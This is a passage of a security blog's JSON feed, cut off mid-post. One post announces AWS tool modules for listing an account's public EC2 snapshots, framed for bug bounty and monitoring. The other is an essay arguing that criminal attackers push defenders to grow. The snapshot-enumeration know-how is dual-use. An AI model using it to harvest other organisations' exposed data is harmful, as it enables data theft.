// API callback
recentposts({"version":"1.0","encoding":"UTF-8","feed":{"xmlns":"http://www.w3.org/2005/Atom","xmlns$openSearch":"http://a9.com/-/spec/opensearchrss/1.0/","xmlns$blogger":"http://schemas.google.com/blogger/2008","xmlns$georss":"http://www.georss.org/georss","xmlns$gd":"http://schemas.google.com/g/2005","xmlns$thr":"http://purl.org/syndication/thread/1.0","id":{"$t":"tag:blogger.com,1999:blog-8539880144347728238"},"updated":{"$t":"2023-08-23T16:29:45.305-04:00"},"category":[{"term":"Pentesting"},{"term":"Metasploit"},{"term":"cktricky"},{"term":"hacking"},{"term":"Book Reviews"},{"term":"Security Conferences"},{"term":"news"},{"term":"devoops"},{"term":"Chris Gates"},{"term":"client side attacks"},{"term":"devops"},{"term":"rant"},{"term":"web application testing"},{"term":"oracle"},{"term":"low2pwned"},{"term":"information Gathering"},{"term":"pwnage"},{"term":"auxiliary modules"},{"term":"carnal0wnage"},{"term":"cloud"},{"term":"enumeration"},{"term":"EthicalHacker.net"},{"term":"Learn Security Online"},{"term":"chicagocon"},{"term":"Kubernetes"},{"term":"Wireless"},{"term":"day in the life"},{"term":"jenkins"},{"term":"Maltego"},{"term":"certification"},{"term":"meterpreter"},{"term":"mimikatz"},{"term":"pass the hash"},{"term":"phishing"},{"term":"politics"},{"term":"Security"},{"term":"malware"},{"term":"password cracking"},{"term":"post-exploitation"},{"term":"powershell"},{"term":"Incident Response"},{"term":"android"},{"term":"automation"},{"term":"blackhat DC"},{"term":"exploits"},{"term":"linux"},{"term":"press"},{"term":"privacy"},{"term":"token impersonation"},{"term":"toorcon"},{"term":"SQL  Injection"},{"term":"incognito"},{"term":"mubix"},{"term":"scanning"},{"term":"shmoocon 09"},{"term":"webcasts"},{"term":"wrap-up"},{"term":"DNS"},{"term":"HackerDefender"},{"term":"Security Metrics"},{"term":"VNC"},{"term":"aircrack-ng"},{"term":"chris nickerson"},{"term":"fail"},{"term":"mike murray"},{"term":"nmap"},{"term":"rootkit"},{"term":"shmoocon 08"},{"term":"shotgun posts"},{"term":"token kidnaping"},{"term":"Crash Course in Penetration Testing"},{"term":"Full Scope Security"},{"term":"IPv6"},{"term":"Paterva"},{"term":"Physical Security"},{"term":"Research"},{"term":"SOURCE Boston 2009"},{"term":"Scapy"},{"term":"antivirus"},{"term":"coldfusion"},{"term":"hack tools"},{"term":"hakin9"},{"term":"http options"},{"term":"identity theft"},{"term":"interviews"},{"term":"jboss"},{"term":"karma"},{"term":"nessus"},{"term":"passthehash toolkit"},{"term":"podcasts"},{"term":"privacy is dead"},{"term":"rpcclient"},{"term":"snmp"},{"term":"social engineering"},{"term":"ubuntu"},{"term":"webdav"},{"term":"AttackResearch"},{"term":"Botnets"},{"term":"Dan Hoffman"},{"term":"GoogleAds"},{"term":"Joe McCray"},{"term":"MAME"},{"term":"NTP"},{"term":"Network Mapping"},{"term":"OMG Python"},{"term":"Packet Analysis"},{"term":"Programming"},{"term":"RetroPie"},{"term":"SCADA"},{"term":"Security Data Visualization"},{"term":"Traceroute"},{"term":"Traceroute Visulization"},{"term":"airodump-ng"},{"term":"attack analysis"},{"term":"aws"},{"term":"backtrack2"},{"term":"backtrack3"},{"term":"blue teaming"},{"term":"cadaver"},{"term":"citrix hacking"},{"term":"conspiracy"},{"term":"coolest Dad ever"},{"term":"defcon"},{"term":"defense"},{"term":"digging into the chewy center"},{"term":"elasticsearch"},{"term":"emulators"},{"term":"foursquare"},{"term":"ike-scan"},{"term":"install your own linux distro"},{"term":"java"},{"term":"javascript"},{"term":"jeremiah grossman"},{"term":"john the ripper"},{"term":"kanoOS kano computers"},{"term":"karmasploit"},{"term":"karmetasploit"},{"term":"lotus domino"},{"term":"mentoring"},{"term":"mssql"},{"term":"mssql_login"},{"term":"mssql_ping"},{"term":"msvctl"},{"term":"null-session"},{"term":"paranoia"},{"term":"privilege escalation"},{"term":"purple teaming"},{"term":"raspberry pi"},{"term":"risk management"},{"term":"ruby"},{"term":"scripting"},{"term":"sensepost"},{"term":"sqlmap"},{"term":"ssl"},{"term":"stupid users"},{"term":"tempest"},{"term":"twitter"},{"term":"windows vista"},{"term":"8570.1"},{"term":"AFP"},{"term":"DNS Fingerprinting"},{"term":"DNS exploit"},{"term":"Dr-crack"},{"term":"EFF NSA Shirt"},{"term":"Endpoint Security"},{"term":"Fabric"},{"term":"Fresh New Look"},{"term":"Full Scope Testing"},{"term":"Fuzzing: Brute Force Vulnerability Discovery"},{"term":"GCP"},{"term":"Geek Mafia"},{"term":"HE Windows"},{"term":"HR Geeks"},{"term":"Hacking Exposed Windows"},{"term":"IE7 Exploit"},{"term":"Information Security Day"},{"term":"Joe Klein"},{"term":"Johnny Long"},{"term":"LG voyager"},{"term":"MAC addresses"},{"term":"Mail"},{"term":"Metasploit Pro"},{"term":"No Place To Hide"},{"term":"No Tech Hacking"},{"term":"NoVA Sec"},{"term":"P2P"},{"term":"Programming Book Review Criteria"},{"term":"QEMU"},{"term":"SOURCE Boston 2008"},{"term":"The Art of Software Security Testing"},{"term":"The Craft of System Security"},{"term":"Traceroute Aggregation"},{"term":"Val Smith"},{"term":"WTF"},{"term":"XSS"},{"term":"amplification attacks"},{"term":"apple filing protocol"},{"term":"brute forcing"},{"term":"bugbounty"},{"term":"burp suite"},{"term":"bypassuac"},{"term":"chef"},{"term":"cisco"},{"term":"cisco asa"},{"term":"conti"},{"term":"cve"},{"term":"databases"},{"term":"deauth attack"},{"term":"defeating AV"},{"term":"dhcp script injection"},{"term":"digital signatures"},{"term":"dll"},{"term":"docker"},{"term":"domo kun video"},{"term":"ec2"},{"term":"education"},{"term":"eeepc"},{"term":"enum4linux"},{"term":"espionage"},{"term":"excel macro"},{"term":"exotic liability"},{"term":"exploit dev course"},{"term":"fckeditor"},{"term":"file format"},{"term":"firewire"},{"term":"forenics"},{"term":"full disclosure"},{"term":"github"},{"term":"google dorks"},{"term":"gsecdump"},{"term":"hack minecraft"},{"term":"hadoop"},{"term":"hijacking"},{"term":"http-dir-enum"},{"term":"ida pro"},{"term":"impacket"},{"term":"infosecwriters.com"},{"term":"irc"},{"term":"java decompile"},{"term":"kerberos"},{"term":"kickstart files"},{"term":"kismet"},{"term":"layer2"},{"term":"lft"},{"term":"life"},{"term":"linkedin"},{"term":"local root"},{"term":"local to domain account"},{"term":"metacab"},{"term":"metagoofil"},{"term":"motorola xoom root"},{"term":"mwr InfoSecurity"},{"term":"ncrack"},{"term":"netapp"},{"term":"non-english"},{"term":"notes"},{"term":"null sa"},{"term":"offtopic"},{"term":"opinion"},{"term":"osx"},{"term":"password filters"},{"term":"pentoo"},{"term":"persistence"},{"term":"pidgin"},{"term":"portqry"},{"term":"printer hacking"},{"term":"procdump"},{"term":"process injection"},{"term":"proxychains"},{"term":"puttyhijack"},{"term":"pwn plug elite"},{"term":"quotes"},{"term":"rainbow tables"},{"term":"reDuh"},{"term":"red team"},{"term":"red teaming"},{"term":"redis"},{"term":"resource scripts"},{"term":"rfid"},{"term":"richard bejtlich"},{"term":"roomwizard"},{"term":"scams"},{"term":"scp"},{"term":"sensitive data leakage"},{"term":"server-status"},{"term":"sharepoint"},{"term":"shmoocon 15"},{"term":"silc"},{"term":"slicehost"},{"term":"smbshell"},{"term":"sqid"},{"term":"sqlite3"},{"term":"sticky keys"},{"term":"sticky ports"},{"term":"sunday comics"},{"term":"swfscan"},{"term":"talks"},{"term":"thin client hacking"},{"term":"timestomp"},{"term":"tnscmd"},{"term":"tsa"},{"term":"unicornscan"},{"term":"upload.asp"},{"term":"usernames"},{"term":"vagrant"},{"term":"volatility"},{"term":"volreg"},{"term":"vulnerability"},{"term":"w3af"},{"term":"webgoat"},{"term":"webshells"},{"term":"weridAAL"},{"term":"wmap"},{"term":"wmic"},{"term":"wordpress"},{"term":"xml"},{"term":"yersinia"},{"term":"youtube"},{"term":"zone transfers"}],"title":{"type":"text","$t":"Carnal0wnage Blog"},"subtitle":{"type":"html","$t":""},"link":[{"rel":"http://schemas.google.com/g/2005#feed","type":"application/atom+xml","href":"https:\/\/blog.carnal0wnage.com\/feeds\/posts\/default"},{"rel":"self","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default?alt=json-in-script"},{"rel":"alternate","type":"text/html","href":"https:\/\/blog.carnal0wnage.com\/"},{"rel":"hub","href":"http://pubsubhubbub.appspot.com/"},{"rel":"next","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default?alt=json-in-script\u0026start-index=26\u0026max-results=25"}],"author":[{"name":{"$t":"Unknown"},"email":{"$t":"noreply@blogger.com"},"gd$image":{"rel":"http://schemas.google.com/g/2005#thumbnail","width":"16","height":"16","src":"https:\/\/img1.blogblog.com\/img\/b16-rounded.gif"}}],"generator":{"version":"7.00","uri":"http://www.blogger.com","$t":"Blogger"},"openSearch$totalResults":{"$t":"644"},"openSearch$startIndex":{"$t":"1"},"openSearch$itemsPerPage":{"$t":"25"},"entry":[{"id":{"$t":"tag:blogger.com,1999:blog-8539880144347728238.post-6670582285901441957"},"published":{"$t":"2020-05-17T20:01:00.001-04:00"},"updated":{"$t":"2020-05-17T20:03:25.316-04:00"},"category":[{"scheme":"http://www.blogger.com/atom/ns#","term":"aws"},{"scheme":"http://www.blogger.com/atom/ns#","term":"weridAAL"}],"title":{"type":"text","$t":"WeirdAAL update - get EC2 snapshots"},"content":{"type":"html","$t":"I watched a good DEF CON video on abusing public AWS Snapshots\u003Cdiv\u003E\u003Cbr \/\u003E\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\u003Ciframe allowfullscreen=\"\" class=\"BLOG_video_class\" height=\"266\" src=\"https:\/\/www.youtube.com\/embed\/-LGR63yCTts\" width=\"320\" youtube-src-id=\"-LGR63yCTts\"\u003E\u003C\/iframe\u003E\u003C\/div\u003E\u003Cdiv\u003E\u003Cbr \/\u003E\u003C\/div\u003E\u003C\/div\u003E\u003Cdiv\u003E\u003Ca href=\"https:\/\/www.youtube.com\/watch?v=-LGR63yCTts\"\u003Ehttps:\/\/www.youtube.com\/watch?v=-LGR63yCTts\u003C\/a\u003E\u003C\/div\u003E\u003Cdiv\u003E\u003Cbr \/\u003E\u003C\/div\u003E\u003Cdiv\u003EI, of course, wanted to check this out. There are tens of thousands of public snapshots in the various regions.\u0026nbsp; The talk outlines what you can do with these and Bishop Fox released a tool to do it \u003Ca href=\"https:\/\/github.com\/BishopFox\/dufflebag\" target=\"_blank\"\u003Ehttps:\/\/github.com\/BishopFox\/dufflebag\u003C\/a\u003E. I wanted to script up a few weirdAAL modules to 1) for an AWS keypair you are testing check and see what snapshots you have available 2) for an AWS accountid list public snapshots.\u0026nbsp; Useful for bug bounty or for monitoring your org for public snapshots.\u0026nbsp; The account you are using will need at least\u0026nbsp;\u003Ci\u003EAmazonEC2ReadOnlyAccess\u0026nbsp;\u003C\/i\u003Eprivileges.\u003C\/div\u003E\u003Cdiv\u003E\u003Cbr \/\u003E\u003C\/div\u003E\u003Cdiv\u003EScreenshot of the 2nd function below\u003C\/div\u003E\u003Cdiv\u003E\u003Cbr \/\u003E\u003C\/div\u003E\u003Ctable align=\"center\" cellpadding=\"0\" cellspacing=\"0\" class=\"tr-caption-container\" style=\"margin-left: auto; margin-right: auto;\"\u003E\u003Ctbody\u003E\u003Ctr\u003E\u003Ctd style=\"text-align: center;\"\u003E\u003Ca href=\"https:\/\/1.bp.blogspot.com\/-ZFp9IT-TwfI\/XsHM0WXM-wI\/AAAAAAAACkM\/6veYWieDQTAw4EXY2e_9AqGEbIDHCjklACK4BGAsYHg\/Screen%2BShot%2B2020-05-17%2Bat%2B7.38.16%2BPM.png\" style=\"margin-left: auto; margin-right: auto;\"\u003E\u003Cimg border=\"0\" data-original-height=\"1202\" data-original-width=\"2086\" height=\"368\" src=\"https:\/\/1.bp.blogspot.com\/-ZFp9IT-TwfI\/XsHM0WXM-wI\/AAAAAAAACkM\/6veYWieDQTAw4EXY2e_9AqGEbIDHCjklACK4BGAsYHg\/w640-h368\/Screen%2BShot%2B2020-05-17%2Bat%2B7.38.16%2BPM.png\" width=\"640\" \/\u003E\u003C\/a\u003E\u003C\/td\u003E\u003C\/tr\u003E\u003Ctr\u003E\u003Ctd class=\"tr-caption\" style=\"text-align: center;\"\u003Elisting snapshots for a random AWS accountid\u003C\/td\u003E\u003C\/tr\u003E\u003C\/tbody\u003E\u003C\/table\u003E\u003Cdiv\u003E\u003Cbr \/\u003E\u003C\/div\u003E\u003Cdiv\u003EYou can git clone or git pull to get the updated code from\u0026nbsp;\u003Ca href=\"https:\/\/github.com\/carnal0wnage\/weirdAAL\" target=\"_blank\"\u003Ehttps:\/\/github.com\/carnal0wnage\/weirdAAL\u003C\/a\u003E\u003C\/div\u003E\u003Cdiv\u003E\u003Cbr \/\u003E\u003C\/div\u003E\u003Cdiv\u003EIf you just want to do it with the AWS CLI you can use the following shell script:\u003C\/div\u003E\u003Cdiv\u003E\u003Cbr \/\u003E\u003Cscript src=\"https:\/\/gist.github.com\/carnal0wnage\/255f26c95205881319e66ddf24cfc0ac.js\"\u003E\u003C\/script\u003E\u003C\/div\u003E\u003Cdiv\u003E\u003Cbr \/\u003E\u003C\/div\u003E\u003Cdiv\u003E\u003Cbr \/\u003E\u003C\/div\u003E"},"link":[{"rel":"replies","type":"application/atom+xml","href":"https:\/\/blog.carnal0wnage.com\/feeds\/6670582285901441957\/comments\/default","title":"Post Comments"},{"rel":"replies","type":"text/html","href":"https:\/\/www.blogger.com\/comment.g?blogID=8539880144347728238\u0026postID=6670582285901441957","title":"0 Comments"},{"rel":"edit","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/6670582285901441957"},{"rel":"self","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/6670582285901441957"},{"rel":"alternate","type":"text/html","href":"https:\/\/blog.carnal0wnage.com\/2020\/05\/weirdaal-update-get-ec2-snapshots.html","title":"WeirdAAL update - get EC2 snapshots"}],"author":[{"name":{"$t":"Unknown"},"email":{"$t":"noreply@blogger.com"},"gd$image":{"rel":"http://schemas.google.com/g/2005#thumbnail","width":"16","height":"16","src":"https:\/\/img1.blogblog.com\/img\/b16-rounded.gif"}}],"media$thumbnail":{"xmlns$media":"http://search.yahoo.com/mrss/","url":"https:\/\/img.youtube.com\/vi\/-LGR63yCTts\/default.jpg","height":"72","width":"72"},"thr$total":{"$t":"0"}},{"id":{"$t":"tag:blogger.com,1999:blog-8539880144347728238.post-4016695769306652544"},"published":{"$t":"2020-04-27T12:36:00.000-04:00"},"updated":{"$t":"2020-04-28T15:08:44.740-04:00"},"title":{"type":"text","$t":"The Duality of Attackers - Or Why Bad Guys are a Good Thing™"},"content":{"type":"html","$t":"\u003Cdiv dir=\"ltr\" id=\"docs-internal-guid-68f993f4-7fff-361a-b5d0-43ea2e8618f1\" style=\"line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;\"\u003E\n\u003Cspan style=\"font-family: \u0026quot;arial\u0026quot; , \u0026quot;helvetica\u0026quot; , sans-serif; vertical-align: baseline; white-space: pre-wrap;\"\u003EThe Duality of Attackers - Or Why Bad Guys are a Good Thing™\u003C\/span\u003E\u003C\/div\u003E\n\u003Cspan style=\"font-family: \u0026quot;arial\u0026quot; , \u0026quot;helvetica\u0026quot; , sans-serif;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cbr \/\u003E\n\u003Cdiv dir=\"ltr\" style=\"line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;\"\u003E\n\u003Cspan style=\"font-family: \u0026quot;arial\u0026quot; , \u0026quot;helvetica\u0026quot; , sans-serif;\"\u003E\u003Cspan style=\"vertical-align: baseline; white-space: pre-wrap;\"\u003EIt’s no secret I've been on a spiritual journey the last few years. I tell most people it’s fundamentally changed my life and how I look at the world.\u0026nbsp;I’m also a hacker and I’m constantly thinking about how to apply metaphysical or spiritual concepts into my daily life. Because if they are true they should apply broadly and also to many aspects of our lives.\u0026nbsp;One of the key things I’ve learned is that \u003C\/span\u003E\u003Cspan style=\"font-weight: 700; vertical-align: baseline; white-space: pre-wrap;\"\u003Eperspective\u003C\/span\u003E\u003Cspan style=\"vertical-align: baseline; white-space: pre-wrap;\"\u003E drives an individual's opinion of a situation or event.\u0026nbsp;Is something good? Is something bad? It all depends on the observer’s perspective of the situation.\u003C\/span\u003E\u003C\/span\u003E\u003C\/div\u003E\n\u003Cspan style=\"font-family: \u0026quot;arial\u0026quot; , \u0026quot;helvetica\u0026quot; , sans-serif;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cbr \/\u003E\n\u003Cdiv dir=\"ltr\" style=\"line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;\"\u003E\n\u003Cspan style=\"font-family: \u0026quot;arial\u0026quot; , \u0026quot;helvetica\u0026quot; , sans-serif; vertical-align: baseline; white-space: pre-wrap;\"\u003EMy first Battalion Commander in the Army when I was having my welcome to the unit meeting said something I've never forgotten.\u0026nbsp;He said “On any given day it’s better to be a Soldier, a DA Civilian, or a Local National (I was in Belgium)”.\u0026nbsp;This stuck with me ever since even though i didn't know what to call it at the time….perspective.\u0026nbsp;\u003C\/span\u003E\u003C\/div\u003E\n\u003Cspan style=\"font-family: \u0026quot;arial\u0026quot; , \u0026quot;helvetica\u0026quot; , sans-serif;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cbr \/\u003E\n\u003Cdiv dir=\"ltr\" style=\"line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;\"\u003E\n\u003Cspan style=\"font-family: \u0026quot;arial\u0026quot; , \u0026quot;helvetica\u0026quot; , sans-serif; vertical-align: baseline; white-space: pre-wrap;\"\u003EIn late 2019 the Irresponsible Open Source Tools (intentionally not linking) debate took over Infosec twitter for a few weeks. Ever since that time I've been thinking about - “Are attackers a good thing?” Not red teaming, not pentesting but straight up criminals. The real steal your shit type, not the point and laugh type, the wreck all your things, steal all the things, potentially end your business type attackers. There were several people basically stating life would be better if attackers did not exist and I wasn't so sure about this.\u0026nbsp;\u003C\/span\u003E\u003C\/div\u003E\n\u003Cspan style=\"font-family: \u0026quot;arial\u0026quot; , \u0026quot;helvetica\u0026quot; , sans-serif;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cbr \/\u003E\n\u003Cdiv dir=\"ltr\" style=\"line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;\"\u003E\n\u003Cspan style=\"font-family: \u0026quot;arial\u0026quot; , \u0026quot;helvetica\u0026quot; , sans-serif; vertical-align: baseline; white-space: pre-wrap;\"\u003ETLDR; I think Yes, attackers are a Good™ thing or rather not a Bad™ thing because they force us to adapt and grow. Growth Through Struggle.\u003C\/span\u003E\u003C\/div\u003E\n\u003Cspan style=\"font-family: \u0026quot;arial\u0026quot; , \u0026quot;helvetica\u0026quot; , sans-serif;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cbr \/\u003E\n\u003Cdiv dir=\"ltr\" style=\"line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;\"\u003E\n\u003Cspan style=\"font-family: \u0026quot;arial\u0026quot; , \u0026quot;helvetica\u0026quot; , sans-serif; vertical-align: baseline; white-space: pre-wrap;\"\u003EBut first, definitions:\u003C\/span\u003E\u003C\/div\u003E\n\u003Cspan style=\"font-family: \u0026quot;arial\u0026quot; , \u0026quot;helvetica\u0026quot; , sans-serif;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cbr \/\u003E\n\u003Cdiv dir=\"ltr\" style=\"line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;\"\u003E\n\u003Cspan style=\"font-family: \u0026quot;arial\u0026quot; , \u0026quot;helvetica\u0026quot; , sans-serif; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;\"\u003EPerspective\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv dir=\"ltr\" style=\"line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;\"\u003E\n\u003Cspan style=\"font-family: \u0026quot;arial\u0026quot; , \u0026quot;helvetica\u0026quot; , sans-serif; vertical-align: baseline; white-space: pre-wrap;\"\u003E“The art of drawing solid objects on a two-dimensional surface so as to give the right impression of their height, width, depth, and position in relation to each other when viewed from a particular point.”\u003C\/span\u003E\u003C\/div\u003E\n\u003Cspan style=\"font-family: \u0026quot;arial\u0026quot; , \u0026quot;helvetica\u0026quot; , sans-serif;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cbr \/\u003E\n\u003Cdiv dir=\"ltr\" style=\"line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;\"\u003E\n\u003Cspan style=\"font-family: \u0026quot;arial\u0026quot; , \u0026quot;helvetica\u0026quot; , sans-serif; vertical-align: baseline; white-space: pre-wrap;\"\u003E“A particular attitude toward or way of regarding something; a point of view.”\u003C\/span\u003E\u003C\/div\u003E\n\u003Cspan style=\"font-family: \u0026quot;arial\u0026quot; , \u0026quot;helvetica\u0026quot; , sans-serif;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cbr \/\u003E\n\u003Cdiv dir=\"ltr\" style=\"line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;\"\u003E\n\u003Cspan style=\"font-family: \u0026quot;arial\u0026quot; , \u0026quot;helvetica\u0026quot; , sans-serif;\"\u003E\u003Cspan style=\"vertical-align: baseline; white-space: pre-wrap;\"\u003EFrom: \u003C\/span\u003E\u003Ca href=\"https:\/\/www.lexico.com\/en\/definition\/perspective\" style=\"text-decoration-line: none;\"\u003E\u003Cspan style=\"vertical-align: baseline; white-space: pre-wrap;\"\u003Ehttps:\/\/www.lexico.com\/en\/definition\/perspective\u003C\/span\u003E\u003C\/a\u003E\u003Cspan style=\"vertical-align: baseline; white-space: pre-wrap;\"\u003E\u0026nbsp;\u003C\/span\u003E\u003C\/span\u003E\u003C\/div\u003E\n\u003Cspan style=\"font-family: \u0026quot;arial\u0026quot; , \u0026quot;helvetica\u0026quot; , sans-serif;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cbr \/\u003E\n\u003Cdiv dir=\"ltr\" style=\"line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;\"\u003E\n\u003Cspan style=\"font-family: \u0026quot;arial\u0026quot; , \u0026quot;helvetica\u0026quot; , sans-serif;\"\u003E\u003Cspan style=\"vertical-align: baseline; white-space: pre-wrap;\"\u003EAnother way to think about perspective and how everyone can have their own is that “Everything (every person, place, thing, situation, event) is fundamentally neutral - they are neutral props with no built in meaning” [\u003C\/span\u003E\u003Ca href=\"https:\/\/youtu.be\/Cp0Vhayn8h8?t=142\" style=\"text-decoration-line: none;\"\u003E\u003Cspan style=\"vertical-align: baseline; white-space: pre-wrap;\"\u003E1\u003C\/span\u003E\u003C\/a\u003E\u003Cspan style=\"vertical-align: baseline; white-space: pre-wrap;\"\u003E] - the observer of the situation or event gives the event meaning.\u003C\/span\u003E\u003C\/span\u003E\u003C\/div\u003E\n\u003Cspan style=\"font-family: \u0026quot;arial\u0026quot; , \u0026quot;helvetica\u0026quot; , sans-serif;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cbr \/\u003E\n\u003Cdiv dir=\"ltr\" style=\"line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;\"\u003E\n\u003Cspan style=\"font-family: \u0026quot;arial\u0026quot; , \u0026quot;helvetica\u0026quot; , sans-serif; vertical-align: baseline; white-space: pre-wrap;\"\u003EThe meaning we put, the meaning we assign to these neutral things completely determines the effect that we get out of them.\u0026nbsp;Every situation can be viewed in many different capacities and it solely depends upon how you perceive it and the association that you create with it and your beliefs about the situation or event.\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;arial\u0026quot; , \u0026quot;helvetica\u0026quot; , sans-serif; vertical-align: baseline; white-space: pre-wrap;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"white-space: pre-wrap;\"\u003E\u003Cspan style=\"font-family: \u0026quot;arial\u0026quot; , \u0026quot;helvetica\u0026quot; , sans-serif;\"\u003EI'm currently fascinated with TV Shows that tackle this subject. \u003Ca href=\"https:\/\/en.wikipedia.org\/wiki\/Lucifer_(TV_series)\" target=\"_blank\"\u003ELucifer\u003C\/a\u003E and \u003Ca href=\"https:\/\/en.wikipedia.org\/wiki\/Good_Omens_(TV_series)\" target=\"_blank\"\u003EGood Omens\u003C\/a\u003E come to mind where the idea that the \"bad\" guy is sometimes the good guy if you evaluate their actions and the \"good\" guy is the bad guy as dictated by their actions or listening to their superiors.\u003C\/span\u003E\u003C\/span\u003E\u003C\/div\u003E\n\u003Cspan style=\"font-family: \u0026quot;arial\u0026quot; , \u0026quot;helvetica\u0026quot; , sans-serif;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cbr \/\u003E\n\u003Cdiv dir=\"ltr\" style=\"line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;\"\u003E\n\u003Cspan style=\"font-family: \u0026quot;arial\u0026quot; , \u0026quot;helvetica\u0026quot; , sans-serif; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;\"\u003EDuality\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv dir=\"ltr\" style=\"line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt;\"\u003E\n\u003Cspan style=\"font-family: \u0026quot;arial\u0026quot; , \u0026quot;helvetica\u0026quot; , sans-serif;\"\u003E\u003Cspan style=\"vertical-align: baseline; white-space: pre-wrap;\"\u003EAs hinted at by the word \"dual\" within it, \u003C\/span\u003E\u003Cspan style=\"font-style: italic; vertical-align: baseline; white-space: pre-wrap;\"\u003Eduality\u003C\/span\u003E\u003Cspan style=\"vertical-align: baseline; white-space: pre-wrap;\"\u003E refers to having two parts, often with opposite meanings, like the \u003C\/span\u003E\u003Cspan style=\"font-style: italic; vertical-align: baseline; white-space: pre-wrap;\"\u003Eduality\u003C\/span\u003E\u003Cspan style=\"vertical-align: baseline; white-space: pre-wrap;\"\u003E of good and evil.\u003C\/span\u003E\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv dir=\"ltr\" style=\"line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt;\"\u003E\n\u003Cspan style=\"font-family: \u0026quot;arial\u0026quot; , \u0026quot;helvetica\u0026quot; , sans-serif; vertical-align: baseline; white-space: pre-wrap;\"\u003EIf there are two sides to a coin, metaphorically speaking, there's a duality. Peace and war, love and hate, up and down, and black and white are dualities. Another term for a duality is a dichotomy. Duality has technical meanings in geometry and physics. In geometry, duality refers to how points and planes have interchangeable roles in projective geometry. In physics, duality is the property of matter and electromagnetic radiation to be understood best through wave theory or particle theory.\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv dir=\"ltr\" style=\"line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt;\"\u003E\n\u003Cspan style=\"font-family: \u0026quot;arial\u0026quot; , \u0026quot;helvetica\u0026quot; , sans-serif;\"\u003E\u003Cspan style=\"vertical-align: baseline; white-space: pre-wrap;\"\u003EFrom: \u003C\/span\u003E\u003Ca href=\"https:\/\/www.vocabulary.com\/dictionary\/duality\" style=\"text-decoration-line: none;\"\u003E\u003Cspan style=\"vertical-align: baseline; white-space: pre-wrap;\"\u003Ehttps:\/\/www.vocabulary.com\/dictionary\/duality\u003C\/span\u003E\u003C\/a\u003E\u003Cspan style=\"vertical-align: baseline; white-space: pre-wrap;\"\u003E\u0026nbsp;\u003C\/span\u003E\u003C\/span\u003E\u003C\/div\u003E\n\u003Cspan style=\"font-family: \u0026quot;arial\u0026quot; , \u0026quot;helvetica\u0026quot; , sans-serif;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cbr \/\u003E\n\u003Cdiv dir=\"ltr\" style=\"line-height: 1.38; margin-bottom: 12pt; margin-top: 0pt; text-align: center;\"\u003E\n\u003Cspan style=\"font-family: \u0026quot;arial\u0026quot; , \u0026quot;helvetica\u0026quot; , sans-serif; font-style: italic; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;\"\u003E“Your truth is truth, my truth is truth, but your truth is not necessarily my truth.”\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv dir=\"ltr\" style=\"line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt;\"\u003E\n\u003Cdiv dir=\"ltr\" id=\"docs-internal-guid-cf3f27ed-7fff-0458-be92-f8319df1ee27\" style=\"line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt;\"\u003E\n\u003Cspan style=\"font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;\"\u003E\u003Cspan style=\"font-family: \u0026quot;arial\u0026quot; , \u0026quot;helvetica\u0026quot; , sans-serif;\"\u003EUnderstanding and being aware of duality is vital to our human experience, as it allows us to see things from ‘both sides of the coin’ and better understand ourselves and others amid the collective. Most individual’s version of ‘truth’ culminates according to their past and current experiences, social conventions, and worldly views. To put it simply, duality is the nature in which everything holds opposing truths — all of which are true — at least in a relative sense.\u003C\/span\u003E\u003C\/span\u003E\u003C\/div\u003E\n\u003Cspan style=\"font-family: \u0026quot;arial\u0026quot; , \u0026quot;helvetica\u0026quot; , sans-serif;\"\u003E\u003Cspan style=\"font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;\"\u003EFrom: \u003C\/span\u003E\u003Ca href=\"https:\/\/quantumstones.com\/what-is-duality-the-doorway-to-all-truths\/\" style=\"text-decoration-line: none;\"\u003E\u003Cspan style=\"font-variant-east-asian: normal; 